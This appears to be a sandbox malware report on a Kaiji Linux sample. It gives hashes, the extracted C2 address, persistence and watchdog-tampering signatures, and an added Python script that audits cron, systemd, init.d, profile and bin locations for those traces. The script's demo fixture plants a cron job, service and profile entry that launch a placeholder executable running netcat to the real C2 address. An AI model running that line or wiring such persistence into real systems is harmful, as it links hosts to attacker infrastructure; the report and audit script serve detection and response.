General

  • Target

    linux_386.elf

  • Size

    1.8MB

  • Sample

    250420-ptgk2aymw9

  • MD5

    f50b701a4d4f21aee1f382065ddbb519

  • SHA1

    e2c151946009bd0bb9acac03c78628a7f295a66f

  • SHA256

    1c1a71735e1d19cfb2149cd99596fdbc44a90a5c229413f710b65ee1a0942c0b

  • SHA512

    29b757fe5097051d8d9194a37dcacaf142d9988df6221dafe5216b1aa59d48722e6c0526a917d6be330247c1e5ed2a2009a1291bdaef6d7407345bbf28dce153

  • SSDEEP

    24576:Inoxw1zy7RvFMNRlnmxlJgAaI0ODBBri8wnJPVwchQItBPUgpxN2SzVVOMaWz1v:s/MBFBuEItpRpaSIWz1

Malware Config

Extracted

Family

kaiji

C2

154.201.91.52:889

Targets

    • Target

      linux_386.elf

    • Renames multiple (1156) files with added filename extension

      Mass renames with an appended extension are the sandbox's generic heuristic for file-encrypting ransomware. Treat it as a lead rather than a verdict: the signature fires on the rename count alone and does not verify that file contents were encrypted, and Kaiji is otherwise known as a Go-based Linux DDoS bot.

    • Executes dropped EXE

    • Modifies Watchdog functionality

      Malware such as Mirai opens /dev/watchdog and disables the hardware watchdog so that it cannot reboot an infected device, which would otherwise clear a memory-resident infection.

    • Reads EFI boot settings

      Reads EFI boot variables from the efivars filesystem; these may contain security secrets or other sensitive data.

    • Creates/modifies Cron job

      Cron runs tasks on a schedule and is commonly used for malware persistence.

    • Creates/modifies environment variables

      Creating or modifying environment variables, typically by editing shell startup files, is a common persistence mechanism.

    • Enumerates running processes

      Discovers information about the processes currently running on the system.

    • Modifies init.d

      Adds or modifies an init.d service script, likely for persistence.

    • Modifies systemd

      Adds or modifies systemd service files, likely to achieve persistence.

    • Write file to user bin folder

    • Modifies Bash startup script
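
The persistence behaviours listed above (cron, init.d, systemd, Bash startup scripts, files written to bin directories) are what a responder would check for on a host suspected of running this sample. The following script is an added example, not part of the sandbox report or of the sample itself: it audits those standard Linux locations under a given root and additionally flags any file that references the C2 endpoint reported in the Malware Config. The paths scanned are generic Linux locations, not paths documented for this sample, and every file name in build_sample_root() is an invented placeholder constructed so the script runs offline; on a live host call audit("/", newer_than=<start of the suspected infection window>).

```python
"""Audit of the persistence locations named in the signatures above. Added example,
not part of the sandbox report or the sample: scans a filesystem root."""
import os
import re
import tempfile

C2_HOST, C2_PORT = "154.201.91.52", 889  # from the Malware Config above
C2_RE = re.compile(re.escape(C2_HOST) + r"(?::%d)?\b" % C2_PORT)

# Standard Linux locations (relative to the scanned root) where the listed
# behaviours land on disk; these are not paths documented for this sample.
CRON = ["etc/crontab", "etc/cron.d", "var/spool/cron/crontabs"]
SERVICES = ["etc/init.d", "etc/systemd/system", "lib/systemd/system", "usr/lib/systemd/system"]
BASH_STARTUP = ["etc/profile", "etc/bash.bashrc", "root/.bashrc", "root/.profile"]
BIN_DIRS = ["bin", "usr/bin", "usr/local/bin"]


def _files(root, rel):
    """Regular files at rel, or directly inside it when rel is a directory."""
    p = os.path.join(root, rel)
    cands = [os.path.join(p, n) for n in sorted(os.listdir(p))] if os.path.isdir(p) else [p]
    return [c for c in cands if os.path.isfile(c)]


def _read(path):
    try:
        with open(path, "rb") as fh:
            return fh.read(1 << 20).decode("utf-8", "replace")
    except OSError:  # unreadable on a live host: still listed, content unknown
        return ""


def audit(root, newer_than=0.0):
    """Return (category, relative path, detail) tuples. Executables in bin
    directories with an mtime before newer_than are skipped, so a live scan
    can be narrowed to the suspected infection window."""
    findings = []

    def flag(cat, path, detail=""):
        findings.append((cat, os.path.relpath(path, root), detail))

    def c2_check(path, text):
        if C2_RE.search(text):
            flag("c2-reference", path, C2_HOST)

    for rel in CRON:  # every active (non-comment) cron line
        for p in _files(root, rel):
            text = _read(p)
            for line in text.splitlines():
                if line.strip() and not line.lstrip().startswith("#"):
                    flag("cron", p, line.strip())
            c2_check(p, text)
    for rel in SERVICES:  # init.d scripts and systemd units, keyed by ExecStart
        for p in _files(root, rel):
            text = _read(p)
            m = re.search(r"^ExecStart=(.*)$", text, re.M)
            flag("init.d" if "init.d" in rel else "systemd", p, m.group(1).strip() if m else "")
            c2_check(p, text)
    # Bash startup scripts: exported variables and launched binaries are how the
    # environment-variable and Bash-startup behaviours above show up on disk.
    for rel in BASH_STARTUP:
        for p in _files(root, rel):
            text = _read(p)
            for s in (l.strip() for l in text.splitlines()):
                if s.startswith("export ") or re.match(r"^(nohup\s+)?(/|\./)\S+", s):
                    flag("bash-startup", p, s)
            c2_check(p, text)
    for rel in BIN_DIRS:  # executables written inside the window
        for p in _files(root, rel):
            if os.access(p, os.X_OK) and os.stat(p).st_mtime >= newer_than:
                flag("user-bin", p, "mtime=%d" % os.stat(p).st_mtime)
                c2_check(p, _read(p))
    return findings


def build_sample_root():
    """Constructed filesystem for the demo; every file name is an invented placeholder."""
    root = tempfile.mkdtemp(prefix="persist-audit-")

    def put(rel, content, exe=False):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write(content)
        os.chmod(p, 0o755 if exe else 0o644)

    put("etc/cron.d/example", "# constructed\n*/5 * * * * root /usr/bin/example_payload >/dev/null 2>&1\n")
    put("etc/init.d/example_persist", "#!/bin/sh\n/usr/bin/example_payload\n", exe=True)
    put("etc/systemd/system/example.service", "[Service]\nExecStart=/usr/bin/example_payload\n")
    put("etc/profile", "# stock profile\nexport LANG=C\nnohup /usr/bin/example_payload &\n")
    put("usr/bin/example_payload", "#!/bin/sh\nexec nc %s %d\n" % (C2_HOST, C2_PORT), exe=True)
    put("usr/bin/ls", "#!/bin/sh\necho benign\n", exe=True)
    os.utime(os.path.join(root, "usr/bin/ls"), (86400, 86400))  # old mtime: outside the window
    return root


if __name__ == "__main__":
    print(*audit(build_sample_root(), newer_than=1_000_000), sep="\n")
```

The output is for a human to triage, not a verdict: a stock /etc/profile will contribute export lines, and a package upgrade will leave fresh executables in /usr/bin, which is why the mtime window matters. The watchdog and efivars behaviours in the report are runtime actions rather than files on disk and are not covered by this scan; on a live host they are better checked through process open-file listings and the sandbox-style syscall trace.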

MITRE ATT&CK Enterprise v16
